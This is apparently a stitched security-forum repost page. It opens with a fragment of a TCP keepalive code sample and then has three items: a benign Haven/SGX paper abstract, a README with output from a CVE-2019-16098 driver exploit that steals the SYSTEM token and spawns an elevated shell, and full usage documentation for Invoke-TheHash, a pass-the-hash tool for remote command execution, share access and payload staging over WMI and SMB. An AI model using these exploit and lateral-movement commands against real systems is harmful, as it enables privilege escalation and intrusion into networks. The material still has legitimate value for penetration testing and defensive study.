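The keepalive plus user-timeout recipe recommended in the post can be sketched as a small helper. This is a minimal sketch, assuming Linux and Python 3.6+ (the TCP_KEEP* and TCP_USER_TIMEOUT options are Linux-specific, and TCP_USER_TIMEOUT is expressed in milliseconds); the 500 ms safety margin is an arbitrary choice, not something the article prescribes:

```python
import socket

def arm_failure_detection(sock, idle=5, intvl=3, cnt=3):
    """Enable keepalives and set TCP_USER_TIMEOUT slightly below
    TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT, per the advice above."""
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, idle)
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, intvl)
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, cnt)
    # Slightly lower than idle + intvl * cnt, so user-timeout does not
    # cancel out the keepalive probe count (value is in milliseconds).
    user_timeout_ms = (idle + intvl * cnt) * 1000 - 500
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_USER_TIMEOUT, user_timeout_ms)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
arm_failure_detection(s)
```

With the defaults above, a dead peer is detected after roughly 5 + 3 * 3 = 14 seconds, whether the connection is idle, busy, or stuck in zero-window.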
  22. Shielding applications from an untrusted cloud with Haven

Andrew Baumann, Marcus Peinado, Galen Hunt
11th USENIX Symposium on Operating Systems Design and Implementation (OSDI '14) | October 2014
Published by USENIX - Advanced Computing Systems Association
Best Paper Award

Today's cloud computing infrastructure requires substantial trust. Cloud users rely on both the provider's staff and its globally-distributed software/hardware platform not to expose any of their private data. We introduce the notion of shielded execution, which protects the confidentiality and integrity of a program and its data from the platform on which it runs (i.e., the cloud operator's OS, VM and firmware). Our prototype, Haven, is the first system to achieve shielded execution of unmodified legacy applications, including SQL Server and Apache, on a commodity OS (Windows) and commodity hardware. Haven leverages the hardware protection of Intel SGX to defend against privileged code and physical attacks such as memory probes, but also addresses the dual challenges of executing unmodified legacy binaries and protecting them from a malicious host. This work motivated recent changes in the SGX specification.

Sursa: https://www.microsoft.com/en-us/research/publication/shielding-applications-from-an-untrusted-cloud-with-haven/
  23. CVE-2019-16098

The driver in Micro-Star MSI Afterburner 4.6.2.15658 (aka RTCore64.sys and RTCore32.sys) allows any authenticated user to read from and write to arbitrary memory, I/O ports, and MSRs. This can be exploited for privilege escalation, code execution under high privileges, and information disclosure. These signed drivers can also be used to bypass the Microsoft driver-signing policy to deploy malicious code. For more updates, visit CVE-2019-16098.

WARNING: Hardcoded Windows 10 x64 Version 1903 offsets!

    Microsoft Windows [Version 10.0.18362.295]
    (c) 2019 Microsoft Corporation. All rights reserved.

    C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
    Barakat

    C:\Users\Barakat\source\repos\CVE-2019-16098>out\build\x64-Debug\CVE-2019-16098.exe
    [*] Device object handle has been obtained
    [*] Ntoskrnl base address: FFFFF80734200000
    [*] PsInitialSystemProcess address: FFFFC288A607F300
    [*] System process token: FFFF9703A9E061B0
    [*] Current process address: FFFFC288B7959400
    [*] Current process token: FFFF9703B9D785F0
    [*] Stealing System process token ...
    [*] Spawning new shell ...
    Microsoft Windows [Version 10.0.18362.295]
    (c) 2019 Microsoft Corporation. All rights reserved.

    C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
    SYSTEM

Sursa: https://github.com/Barakat/CVE-2019-16098
  24. Invoke-TheHash

Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.

Requirements

Minimum PowerShell 2.0

Import

    Import-Module ./Invoke-TheHash.psd1

or

    . ./Invoke-WMIExec.ps1
    . ./Invoke-SMBExec.ps1
    . ./Invoke-SMBEnum.ps1
    . ./Invoke-SMBClient.ps1
    . ./Invoke-TheHash.ps1

Functions

- Invoke-WMIExec
- Invoke-SMBExec
- Invoke-SMBEnum
- Invoke-SMBClient
- Invoke-TheHash

Invoke-WMIExec

WMI command execution function.

Parameters:
- Target - Hostname or IP address of target.
- Username - Username to use for authentication.
- Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username.
- Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format.
- Command - Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash have access to WMI on the target.
- Sleep - Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds.

Example:

    Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

Invoke-SMBExec

SMB (PsExec) command execution function supporting SMB1 and SMB2.1, with and without SMB signing.

Parameters:
- Target - Hostname or IP address of target.
- Username - Username to use for authentication.
- Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username.
- Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format.
- Command - Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash have access to SCM on the target.
- CommandCOMSPEC - Default = Enabled: Prepend %COMSPEC% /C to Command.
- Service - Default = 20 Character Random: Name of the service to create and delete on the target.
- Sleep - Default = 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds.
- Version - Default = Auto: (Auto,1,2.1) Force SMB version. The default behavior is to perform SMB version negotiation and use SMB2.1 if supported by the target.

Example:

    Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

Example: Check SMB signing requirements on target.

    Invoke-SMBExec -Target 192.168.100.20

Invoke-SMBEnum

Invoke-SMBEnum performs User, Group, NetSession and Share enumeration tasks over SMB2.1, with and without SMB signing.

Parameters:
- Target - Hostname or IP address of target.
- Username - Username to use for authentication.
- Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username.
- Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format.
- Action - (All,Group,NetSession,Share,User) Default = Share: Enumeration action to perform.
- Group - Default = Administrators: Group to enumerate.
- Sleep - Default = 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds.
- Version - Default = Auto: (Auto,1,2.1) Force SMB version. The default behavior is to perform SMB version negotiation and use SMB2.1 if supported by the target. Note, only the signing check works with SMB1.

Example:

    Invoke-SMBEnum -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -verbose

Invoke-SMBClient

SMB client function supporting SMB2.1 and SMB signing. This function primarily provides SMB file share capabilities for working with hashes that do not have remote command execution privilege. It can also be used for staging payloads for use with Invoke-WMIExec and Invoke-SMBExec. Note that Invoke-SMBClient is built on the .NET TCPClient and does not use the Windows SMB client; it is much slower than the Windows client.

Parameters:
- Username - Username to use for authentication.
- Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username.
- Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format.
- Action - Default = List: (List/Recurse/Delete/Get/Put) Action to perform.
    List: Lists the contents of a directory.
    Recurse: Lists the contents of a directory and all subdirectories.
    Delete: Deletes a file.
    Get: Downloads a file.
    Put: Uploads a file and sets the creation, access, and last write times to match the source file.
- Source
    List and Recurse: UNC path to a directory.
    Delete: UNC path to a file.
    Get: UNC path to a file.
    Put: File to upload. If a full path is not specified, the file must be in the current directory. When using the 'Modify' switch, 'Source' must be a byte array.
- Destination
    List and Recurse: Not used.
    Delete: Not used.
    Get: If used, value will be the new filename of the downloaded file. If a full path is not specified, the file will be created in the current directory.
    Put: UNC path for the uploaded file. The filename must be specified.
- Modify
    List and Recurse: The function will output an object consisting of directory contents.
    Delete: Not used.
    Get: The function will output a byte array of the downloaded file instead of writing the file to disk. It's advisable to use this only with smaller files and to send the output to a variable.
    Put: Uploads a byte array to a new destination file.
- NoProgress - Prevents displaying an upload and download progress bar.
- Sleep - Default = 100 Milliseconds: Sets the function's Start-Sleep values in milliseconds.
- Version - Default = Auto: (Auto,1,2.1) Force SMB version. The default behavior is to perform SMB version negotiation and use SMB2.1 if supported by the target. Note, only the signing check works with SMB1.

Example: List the contents of a root share directory.

    Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Source \\server\share -verbose

Example: Recursively list the contents of a share starting at the root.

    Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Recurse -Source \\server\share

Example: Recursively list the contents of a share subdirectory and return only the contents output to a variable.

    $directory_contents = Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Recurse -Source \\server\share\subdirectory -Modify

Example: Delete a file on a share.

    Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Delete -Source \\server\share\file.txt

Example: Delete a file in subdirectories within a share.

    Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Delete -Source \\server\share\subdirectory\subdirectory\file.txt

Example: Download a file from a share.

    Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\file.txt

Example: Download a file from within a share subdirectory and set a new filename.

    Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\subdirectory\file.txt -Destination file.txt

Example: Download a file from a share to a byte array variable instead of disk.

    $password_file = Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\file.txt -Modify

Example: Upload a file to a share subdirectory.

    Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Put -Source file.exe -Destination \\server\share\subdirectory\file.exe

Example: Upload a file to a share from a byte array variable.

    Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Put -Source $file_byte_array -Destination \\server\share\file.txt -Modify

Invoke-TheHash

Function for running Invoke-TheHash functions against multiple targets.

Parameters:
- Type - Sets the desired Invoke-TheHash function. Set to either SMBClient, SMBEnum, SMBExec, or WMIExec.
- Target - List of hostnames, IP addresses, CIDR notation, or IP ranges for targets.
- TargetExclude - List of hostnames, IP addresses, CIDR notation, or IP ranges to exclude from the list of targets.
- PortCheckDisable - (Switch) Disable WMI or SMB port check. Since this function is not yet threaded, the port check serves to speed up the function by checking for an open WMI or SMB port before attempting a full synchronous TCPClient connection.
- PortCheckTimeout - Default = 100: Sets the no-response timeout in milliseconds for the WMI or SMB port check.
- Username - Username to use for authentication.
- Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username.
- Hash - NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format.
- Command - Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash have access to WMI or SCM on the target.
- CommandCOMSPEC - Default = Enabled: SMBExec type only. Prepend %COMSPEC% /C to Command.
- Service - Default = 20 Character Random: SMBExec type only. Name of the service to create and delete on the target.
- SMB1 - (Switch) Force SMB1. SMBExec type only. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the target.
- Sleep - Default = WMI 10 Milliseconds, SMB 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds.

Example:

    Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0

Sursa: https://github.com/Kevin-Robertson/Invoke-TheHash/
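The Target/TargetExclude semantics (plain hosts, CIDR notation, exclusions) can be approximated in a few lines of Python. This is a hypothetical helper sketch illustrating how such target lists expand, not code from Invoke-TheHash, and it handles only hostnames, single IPs and CIDR blocks (not arbitrary IP ranges):

```python
import ipaddress

def expand_targets(targets, exclude=()):
    """Expand a mix of hostnames, single IPs and CIDR blocks into a flat
    target list, dropping anything matched by the exclude list."""
    def expand(entry):
        try:
            # CIDR blocks (and single IPs, treated as /32) expand to host addresses
            return [str(ip) for ip in ipaddress.ip_network(entry, strict=False).hosts()]
        except ValueError:
            return [entry]  # not an IP/CIDR: keep the hostname as-is
    excluded = {e for item in exclude for e in expand(item)}
    return [t for item in targets for t in expand(item) if t not in excluded]

print(expand_targets(["192.168.100.0/30"], exclude=["192.168.100.2"]))
# ['192.168.100.1']
```

A /24 such as the example above expands to 254 candidate hosts; the exclude list is expanded the same way, so a CIDR block can be excluded as easily as a single address.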